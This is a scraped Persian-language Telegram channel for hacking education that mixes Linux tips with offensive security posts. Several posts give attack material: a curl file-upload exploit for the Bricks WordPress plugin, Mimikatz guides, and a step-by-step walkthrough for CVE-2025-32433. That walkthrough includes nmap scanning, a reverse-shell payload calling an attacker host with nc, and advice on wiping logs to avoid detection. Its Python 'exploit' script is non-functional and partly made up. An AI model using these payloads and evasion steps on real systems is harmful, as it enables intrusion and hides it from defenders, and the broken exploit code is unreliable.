Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
دوستان درحال راه اندازی لابراتور برای شما هستم
و درگیر ترجمه یک کتاب که به زودی قرار میگیره

برای همین ممکنه فعلا پست آموزشی نباشه

با تشکر از صبر شما .
🤩213🔥1
درود دوستان عزیز

اگر از آموزش‌های ما استفاده می‌کنید و دوست دارید از تلاش ما حمایت کنید، می‌توانید از طریق لینک زیر کمک کوچکی به ما داشته باشید

https://daramet.com/TryHackBox

راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید. 

ممنون که همراه ما هستید. 
10👍1👏1
هکرها از یک قابلیت کمتر شناخته شده در وردپرس به نام Must Use Plugins (پلاگین‌های ضروری) سوءاستفاده می‌کنند تا بدافزارها را نصب و از دید مدیران سایت پنهان کنند، در حالی که دسترسی دائمی از راه دور را حفظ می‌کنند.

قابلیت Must Use Plugins (mu-plugins) چیست؟
این ویژگی که با نام mu-plugins نیز شناخته می‌شود، در سال ۲۰۲۲ به سیستم مدیریت محتوای وردپرس اضافه شد. پلاگین‌هایی که در پوشه خاصی به نام /mu-plugins قرار می‌گیرند، به‌صورت خودکار توسط وردپرس اجرا می‌شوند و نیازی به فعال‌سازی یا تأیید از طریق پیشخوان مدیریت ندارند.

این پلاگین‌ها در بخش معمولی «پلاگین‌ها» نمایش داده نمی‌شوند، بنابراین کاربران نمی‌توانند به‌صورت تصادفی آن‌ها را غیرفعال یا حذف کنند. همین موضوع، این پوشه را به مکانی ایده‌آل برای پنهان‌کردن بدافزارها تبدیل کرده است.


افزایش سوءاستفاده هکرها از mu-plugins
بر اساس گزارش گوَدَدی سیکوری (GoDaddy Sucuri)، هکرها حداقل از فوریه امسال از این قابلیت سوءاستفاده کرده‌اند و اکنون این فعالیت به‌طور قابل توجهی افزایش یافته است.

هکرها با نفوذ به سایت‌های وردپرس، بدافزارها را در پوشه mu-plugins قرار می‌دهند، چون می‌دانند که این کدها به‌صورت خودکار اجرا شده و در پیشخوان سایت نمایش داده نمی‌شوند. علاوه بر این، از آنجا که این قابلیت نسبتاً ناشناخته است، بسیاری از ابزارهای امنیتی وردپرس حتی این پوشه را برای تهدیدات احتمالی اسکن نمی‌کنند.

نمونه‌هایی از بدافزارهای کشف‌شده در mu-plugins
سیکوری متوجه شده است که هکرها از mu-plugins برای موارد زیر استفاده می‌کنند:
- نصب بک‌دورها و وب‌شل‌ها
- قراردادن اسپم سئو در سایت‌های هک‌شده
- تغییر مسیر ترافیک به سایت‌های مخرب

برخی از فایل‌های مخرب شناسایی‌شده:
- wp-content/mu-plugins/redirect.php
- wp-content/mu-plugins/index.php
- wp-content/mu-plugins/custom-js-loader.php

در این میان، فایل redirect.php خود را به‌عنوان «به‌روزرسانی مرورگر» جا می‌زند تا کاربران را فریب دهد و آن‌ها را مجبور به نصب بدافزاری کند که می‌تواند داده‌ها را سرقت کند یا payloadهای اضافی را دانلود کند.

💢 هشدار به مالکان سایت‌های وردپرس
این طیف گسترده از سوءاستفاده‌ها نشان می‌دهد که این روش در حال محبوب‌شدن در بین گروه‌های هکری است که از این پوشه به‌عنوان پایگاهی پایدار برای فعالیت‌های مخرب استفاده می‌کنند.

توصیه‌های امنیتی:
محتوای پوشه mu-plugins را بررسی کنید.
اگر از پلاگین‌های Must Use استفاده نمی‌کنید، آن‌ها را حذف کنید.
مطمئن شوید که حذف به‌صورت دائمی انجام شده است.

با این اقدامات، می‌توانید از سایت خود در برابر این تهدید پنهان محافظت کنید.

@TryHackBox
👍7
آسیب‌پذیری CVE-2024-25600 در پلاگین Bricks وردپرس

معرفی آسیب‌پذیری:
این یک آسیب‌پذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخه‌های 1.9.6 و قبلتر) است.

جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترل‌نشده در admin-ajax.php
- امکان آپلود فایل‌های PHP مخرب
- دسترسی کامل به سرور (web shell)

- کد آسیب‌پذیر:

  // در فایل اصلی پلاگین
add_action('wp_ajax_bricks_upload', 'handle_file_upload');
// عدم وجود بررسی‌های امنیتی کافی

نمونه اکسپلویت:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" \
-F "action=bricks_upload" \
-F "file=@exploit.php"

تأثیرات:
- نصب وب‌شل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستم‌ها

راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان به‌روزرسانی

2. پیشگیرانه:
- محدود کردن دسترسی به admin-ajax.php
- پیاده‌سازی WAF با قوانین مخصوص

تشخیص سوءاستفاده:
- بررسی لاگ‌ها برای درخواست‌های غیرعادی به admin-ajax.php
- جستجوی فایل‌های PHP جدید در دایرکتوری uploads

نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .

https://github.com/Chocapikk/CVE-2024-25600

#Cve
@TryHackBox
👍1
این دستور را در ترمینال خود وارد کنید:

watch -d -n 1 sensors

توضیح :
این دستور اطلاعات دمایی قطعات سخت‌افزاری سیستم شما را به صورت زنده (هر 1 ثانیه) نمایش می‌دهد، شامل:
- دمای پردازنده (CPU)
- دمای کارت گرافیک (GPU)
- دمای مودم وای‌فای (Wi-Fi)
- دمای حافظه‌های NVMe SSD
- دمای هارددیسک‌های (HDD)

#### ویژگی‌های دستور:
- -d:
تغییرات را هایلایت می‌کند
- -n 1:
بروزرسانی هر 1 ثانیه
- sensors:
ابزار اصلی خواندن سنسورهای سخت‌افزاری

نکات فنی:
1. نیاز به نصب بسته lm-sensors دارد (در اوبونتو: sudo apt install lm-sensors)
2. قبل از استفاده باید سنسورها را پیکربندی کنید: sudo sensors-detect
3. برای سیستم‌های مختلف ممکن است خروجی متفاوت باشد
#linux
@TryHackBox
4
نکته سریع لینوکس: حذف پوشه‌های خالی

اگر می‌خواهید پوشه‌های خالی را حذف کنید، می‌توانید از دستور find استفاده کنید:

find . -type d -empty -exec rmdir -v {} +

#### توضیح گزینه‌ها:
- -type d:
فقط پوشه‌ها (دایرکتوری‌ها) را جستجو می‌کند
- -empty:
فقط پوشه‌های خالی را انتخاب می‌کند
- -exec rmdir -v {} +:
دستور rmdir را برای حذف پوشه‌ها اجرا می‌کند و عملیات را نمایش می‌دهد (-v)

روش جایگزین:
find . -type d -empty -delete

نکات مهم:
1. rmdir
فقط پوشه‌های کاملاً خالی را حذف می‌کند (حاوی هیچ فایل یا پوشه دیگری نباشند)
2. گزینه -delete در روش دوم مستقیم پوشه‌ها را حذف می‌کند
3. نقطه (.) در ابتدای دستور به معنای جستجو از پوشه جاری است

مثال کاربردی:
اگر بخواهید پوشه‌های خالی را در مسیر /home/user/docs حذف کنید:
find /home/user/docs -type d -empty -delete

این دستورات برای تمیزکاری خودکار پوشه‌ها و مدیریت فضای ذخیره‌سازی بسیار مفید هستند.

#Linux #لینوکس
@TryHackBox
6👍2
در دستور find گزینه -exec وجود دارد که می‌توان از آن برای فراخوانی یک ابزار خارجی و انجام عملیات خاص روی فایل‌های منطبق با معیارهای جستجو استفاده کرد.

مثال:
find ~/ -type f -exec ls -lah {} \;

این دستور برای انجام یک عمل یکسان روی چندین فایل در مکان‌های مختلف مفید است.

در این مثال، دستور ls -lah برای نمایش اطلاعاتی مانند مجوزها و سایر متاداده‌های هر فایل یافت‌شده اجرا می‌شود.
- علامت {} به‌عنوان جای‌نگهدار نام فایل عمل می‌کند و باید آخرین عنصر در لیست پارامترها باشد.
- علامت ; نشان‌دهنده پایان لیست پارامترهاست و باید با بک‌اسلش (\) محافظت شود، در غیر این صورت شل آن را تفسیر می‌کند.

همچنین می‌توانید به‌جای ; از + استفاده کنید تا پایان لیست پارامترها مشخص شود. بین + و {} باید فاصله وجود داشته باشد.

مثال با +:
find ~/ -type f -exec ls -lah {} +

همچنین می‌توانید چندین دستور را با -exec در find اجرا کنید، مثلاً:
find . -name "*.txt" -exec wc {} \; -exec du -sh {} \;

#نکته‌ #لینوکس
@TryHackBox
👍31🔥1
🔎 یک دورک گوگل که همیشه و همه‌جا جواب می‌دهد

در عملیات شناسایی (Recon)، می‌توانید از چیزی شبیه به این استفاده کنید:

© [COMPANY]. All rights reserved.


برای پیدا کردن تمام دامنه‌های اصلی مرتبط با یک شرکت در صورت نیاز، می‌توانید نتایج نامرتبط را از خروجی جستجو حذف کنید.

توضیح:
- این روش از Google Dorking برای پیدا کردن صفحاتی استفاده می‌کند که شامل عبارت کپی‌رایت استاندارد شرکت‌ها هستند.
- جایگزین کردن [COMPANY] با نام شرکت موردنظر (مثلاً © Google. All rights reserved.) می‌تواند دامنه‌های اصلی و ساب دامنه‌های آن را فاش کند.

- این تکنیک در جستجوی پیشرفته گوگل (Google Hacking) و مرحله شناسایی (Recon) برنامه‌های باگ بانتی مفید است.


#bugbounty #tips #recon
@TryHackBoc
👍9🔥21
قسمت چهارم رادیو زیروپاد - نحوه شناسایی یک کلاهبردار با استفاده…
@RadioZeroPod | @TryHackBoxStory
📖 قسمت چهارم رادیو زیروپاد

💠 نحوه شناسایی یک کلاهبردار با استفاده از اوسینت

🔶️ تا به حال فکر کرده اید که پشت این ایمیل ها چه کسی نشسته؟
🔶️ شروع کار: تعیین هدف
🔶️ بررسی اولیه: ردپای دیجیتال
🔶️ شروع بازی: ساخت یک چهره جعلی
🔶️ ابزارهای OSINT مخصوص پی‌پال
🔶️ نتیجه‌گیری: یک گزارش کامل
🔶️ چه سفر پرماجرایی!
🔶️ آموزش گام‌به‌گام روش‌های استفاده‌شده در  داستان "فریب کلاهبردار با OSINT و مهندسی اجتماعی"
🔶️ ابزارهای مورد نیاز برای ساخت وبسایت بی‌خطر
🔶️ سخن پایانی

🧩 لینک برای خواندن مقاله :
Link

📼 با اجرای آریامهر

#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
👍3
Forwarded from 
آشنایی مقدماتی با mimikatz.pdf
1.1 MB
| آشنایی مقدماتی با Mimikatz 

این کتاب به بررسی ابزار Mimikatz می‌پردازد که برای استخراج پسوردها و اعتبارنامه‌ها از حافظه سیستم استفاده می‌شود. در این کتاب، شما با نحوه کار Mimikatz، قابلیت‌های کلیدی آن، و نمونه‌هایی از APT هکرها که از این ابزار استفاده کرده‌اند آشنا خواهید شد. همچنین، روش‌های مقابله با Mimikatz و عبور از نرم‌افزارهای امنیتی نیز بررسی شده است. 

لینک گیت هاب :
https://github.com/TryHackBox/Books
کانال آموزشی در تلگرام :
https://news.1rj.ru/str/TryHackBox

نویسنده : توییتر من :
https://www.x.com/kavehxnet

@KavehAPT
راهنمای_جامع_ابزار_Mimikatz_راهنمای_هکرها.pdf
4.4 MB
| راهنمای جامع ابزار Mimikatz 
این کتاب به بررسی ابزار Mimikatz می‌پردازد که برای استخراج پسوردها، هش‌ها و توکن‌های دسترسی از حافظه سیستم استفاده می‌شود. در این کتاب، شما با تکنیک‌های پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامه‌ها، دور زدن مکانیزم‌های امنیتی و افزایش دسترسی. همچنین، نمونه‌هایی از حملات واقعی که از Mimikatz استفاده کرده‌اند و نحوه مقابله با این ابزار بررسی شده است. 

گیت هاب :
https://github.com/TryHackBox/Books
کانال آموزشی در تلگرام :
https://news.1rj.ru/str/TryHackBox

نویسنده : توییتر من :
https://www.x.com/kavehxnet

@KavehAPT
👍2
راهنمای_جامع_ابزار_Mimikatz_راهنمای_هکرها.pdf
به درخواست دوستان کتاب اینجا هم گذاشتیم
👍2
🔍 50 موتور جستجو برای هکرهای اخلاقی

#tools #pentest
@TryHackBox
👍31
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 یکی از ساده ترین راه ها برای پیدا کردن SQL injection با استفاده از جستجوی کد Github

➡️همان مثال برای SSRF:
/file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET/

/(subprocess|exec|spawn|system).*chrome.*--headless/

#bugbounty #pentest #tips
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
👍7👏2🤩2🔥1
قسمت ششم رادیو زیرو پاد - داستان عجیب نوجوانانی که botnet میرای…
@RadioZeroPod | @TryHackBoxStory
📖 قسمت ششم رادیو زیرو پاد

💠 داستان عجیب نوجوانانی که botnet میرای را ساختند 


🔶️ این داستان واقعی درباره نوجوانانی است که بات‌نت Mirai را ساختند. 

🔶️ میرای توسط چند دانشجو توسعه داده شد که قصد داشتند به دانشگاه خود حمله DDOS انجام دهند. اما در نهایت، این بات‌نت تبدیل به بزرگترین بات‌نت IoT شد و سازندگانش دستگیر و زندانی شدند. 

🔶️ جالب اینجاست که کد Mirai بسیار ساده و کم‌حجم بود و از تکنولوژی پیچیده‌ای استفاده نکرده بود. این بات‌نت تنها با ۳۱ ترکیب نام کاربری و رمز عبور گسترش یافت، اما همین مقدار هم کافی بود تا بیش از ۵۰۰ هزار دستگاه IoT را آلوده کند. 

🧩 لینک برای خواندن مقاله :
Link

📼 با اجرای آریامهر

#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
👍3🔥3🙏1
آیا TLS امن.pdf
1 MB
🔖 چگونه از WinRMS برای NTLM Relay استفاده کنیم؟

مقاله زیر ابتدا به توضیح درباره پروتکل WinRM و WinRMS پرداخته و سپس نحوه NTLM Relay و اجرای کد در سیستم قربانی از طریق این پروتکل را بیان می‌کند.

🔶️ Blog :
https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
🔶️ impacket :
https://github.com/fortra/impacket/pull/1947

🔶️ Demo :
https://youtu.be/3mG2Ouu3Umk


@TryHackBox
👍4
Try Hack Box pinned Deleted message
سیسکو تأیید می‌کند که برخی از محصولات آن تحت تأثیر آسیب‌پذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفته‌اند.

این آسیب‌پذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی می‌شود و به عنوان مشکلی در پردازش پیام‌های پروتکل SSH شرح داده می‌شود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستم‌های آسیب‌پذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.

محققان هشدار دادند که بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به تسلط کامل میزبان‌ها شود که به افراد ثالث اجازه می‌دهد به داده‌های حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.

CVE-2025-32433
در نسخه‌های OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخه‌های قبلی تحت تأثیر قرار دارند.

چندی پس از اینکه وجود این آسیب‌پذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهره‌برداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپت‌های PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.

محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاه‌ها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاه‌های Cisco و Ericsson از Erlang استفاده می‌کنند.

هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده می‌کند، مانند آنچه در دستگاه‌های OT/IoT و دستگاه‌های محاسبات لبه استفاده می‌شود، در معرض خطر هک قرار دارد.


Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کرده‌اند، این نرم‌افزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده می‌شود.


با این حال، برای این شرکت‌ها معمولاً نصب جداگانه‌ای از Erlang/OTP مورد نیاز است.

در همین حال، Cisco ادامه می‌دهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گستره‌ای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامه‌های شبکه را بررسی کند.

در حال حاضر، شرکت به طور قطعی تأیید می‌کند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفته‌اند.

غول شبکه‌ای اشاره کرد که اگرچه ConfD و NSO (که انتظار می‌رود در ماه مه اصلاح شوند) تحت تأثیر آسیب‌پذیری قرار دارند، به دلیل پیکربندی خود، آسیب‌پذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
👍1
Try Hack Box
سیسکو تأیید می‌کند که برخی از محصولات آن تحت تأثیر آسیب‌پذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفته‌اند. این آسیب‌پذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی…
برای توضیح نحوه بهره‌برداری از آسیب‌پذیری CVE-2025-32433 در Erlang/OTP و پیاده‌سازی حمله، باید ابتدا به جزئیات فنی آسیب‌پذیری و مکانیزم آن توجه کرد. این آسیب‌پذیری مربوط به پردازش نادرست پیام‌های پروتکل SSH است که می‌تواند منجر به اجرای کد از راه دور (RCE) شود. در ادامه، مراحل کلی بهره‌برداری از این آسیب‌پذیری و دستورات مرتبط را بررسی می‌کنیم.

1. شناخت محیط تارگت
قبل از هر چیز، مهاجم باید یک سیستم آسیب‌پذیر را شناسایی کند. این سیستم‌ها معمولاً شامل دستگاه‌هایی هستند که از Erlang/OTP با نسخه‌های مستعد آسیب‌پذیری استفاده می‌کنند. مثال‌هایی از این دستگاه‌ها عبارتند از:
- Cisco NSO و ConfD
- دستگاه‌های OT/IoT
- سیستم‌های مدیریت شبکه


2. شناسایی سرویس SSH قابل دسترس
مهاجم باید سرویس SSH روی سیستم تارگت را شناسایی کند. این کار معمولاً با استفاده از ابزارهایی مانند nmap انجام می‌شود. دستور زیر می‌تواند برای اسکن پورت‌های باز و شناسایی خدمات SSH استفاده شود:

nmap -p 22 <IP_target> --noscript ssh2-enum-algos

این دستور پورت 22 (معمولاً پورت پیش‌فرض SSH) را اسکن کرده و الگوریتم‌های SSH پشتیبانی‌شده توسط سیستم تارگت را شناسایی می‌کند.

3. تهیه ابزار بهره‌برداری (Exploit Script)
با توجه به اینکه PoC (Proof of Concept) برای این آسیب‌پذیری در دسترس عموم قرار گرفته است، مهاجم می‌تواند از این اسکریپت‌ها استفاده کند. این ابزارها معمولاً به صورت اسکریپت‌های Python یا C نوشته می‌شوند.

مثالی از یک اسکریپت بهره‌برداری (فرضی):

import paramiko
import sys

def exploit(ip, port, payload):
try:
# ایجاد اتصال SSH
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# ارسال پیام خاصی که آسیب‌پذیری را فعال می‌کند
transport = paramiko.Transport((ip, port))
transport.start_client()

# ارسال پیلود مخرب
transport._send_message(payload)
print("[+] Exploit Sent!")

# اجرا و دسترسی به سیستم
stdin, stdout, stderr = client.exec_command("id")
print(stdout.read().decode())

except Exception as e:
print(f"[-] Failed: {e}")

if __name__ == "__main__":
if len(sys.argv) != 4:
print(f"Usage: {sys.argv[0]} <IP> <Port> <Payload>")
sys.exit(1)

ip = sys.argv[1]
port = int(sys.argv[2])
payload = sys.argv[3]

exploit(ip, port, payload)

4. اجرای حمله
مهاجم می‌تواند از طریق اجرای اسکریپت فوق، حمله را شروع کند. مراحل کلی به شرح زیر است:

الف) آماده‌سازی پیلود
مهاجم باید یک پیلود مخرب تهیه کند که می‌تواند شامل دستورات سیستمی برای اجرای کد از راه دور باشد. مثال:

/bin/bash -c "nc -e /bin/bash <IP_Attacker> <Port>"

این پیلود یک Reverse Shell ایجاد می‌کند که به مهاجم اجازه می‌دهد به سیستم تارگت دسترسی کامل پیدا کند.

ب) اجرای اسکریپت
مهاجم اسکریپت را با آدرس IP، پورت و پیلود مورد نظر اجرا می‌کند:

python3 exploit.py <IP_Target> "/bin/bash -c 'nc -e /bin/bash <IP_attacker> <Port>'"

5. دسترسی به سیستم تارگت
اگر حمله موفق باشد، مهاجم می‌تواند از طریق اتصال Reverse Shell به سیستم تارگت دسترسی کامل پیدا کند. این دسترسی می‌تواند شامل انجام اعمال زیر باشد:
- دستکاری فایل‌ها
- دسترسی به داده‌های حساس
- اجرای دستورات سیستمی
- نصب بدافزار یا Backdoor


6. جلوگیری از تشخیص
مهاجمان معمولاً تلاش می‌کنند ردپای خود را پاک کنند تا از تشخیص حمله جلوگیری کنند. این کار می‌تواند شامل موارد زیر باشد:
- پاک کردن لاگ‌های سیستم (/var/log/)
- غیرفعال کردن ابزارهای مانیتورینگ
- تغییر تنظیمات فایروال یا SSH

7. تأثیرات حمله
در صورت موفقیت، مهاجم می‌تواند:
- کنترل کامل سیستم: دسترسی root یا مدیریتی به دستگاه تارگت.
- حملات DoS: باعث ایجاد اختلال در عملکرد دستگاه شود.
- دسترسی به داده‌های حساس: اطلاعات محرمانه را سرقت یا دستکاری کند.

راهکارهای مقابله
برای جلوگیری از بهره‌برداری از این آسیب‌پذیری، توصیه‌های زیر ارائه می‌شود:
1. به‌روزرسانی Erlang/OTP: نسخه‌های OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 را نصب کنید.
2. غیرفعال کردن SSH: اگر استفاده از SSH ضروری نیست، آن را غیرفعال کنید.
3. استفاده از فایروال: دسترسی به پورت SSH را محدود کنید.
4. نظارت بر لاگ‌ها: به دنبال فعالیت‌های مشکوک در لاگ‌های سیستم باشید.
@TryHackBox
👍8
Try Hack Box
برای توضیح نحوه بهره‌برداری از آسیب‌پذیری CVE-2025-32433 در Erlang/OTP و پیاده‌سازی حمله، باید ابتدا به جزئیات فنی آسیب‌پذیری و مکانیزم آن توجه کرد. این آسیب‌پذیری مربوط به پردازش نادرست پیام‌های پروتکل SSH است که می‌تواند منجر به اجرای کد از راه دور (RCE)…
نتیجه‌گیری
آسیب‌پذیری CVE-2025-32433 به دلیل سادگی بهره‌برداری و تأثیرات بالقوه‌اش، تهدیدی جدی برای سیستم‌هایی است که از Erlang/OTP استفاده می‌کنند. مهاجمان می‌توانند از این آسیب‌پذیری برای دسترسی کامل به سیستم‌ها و انجام حملات مختلف استفاده کنند. بنابراین، به‌روزرسانی نرم‌افزارها و اجرای تدابیر امنیتی ضروری است.

⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شده‌اند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
👍2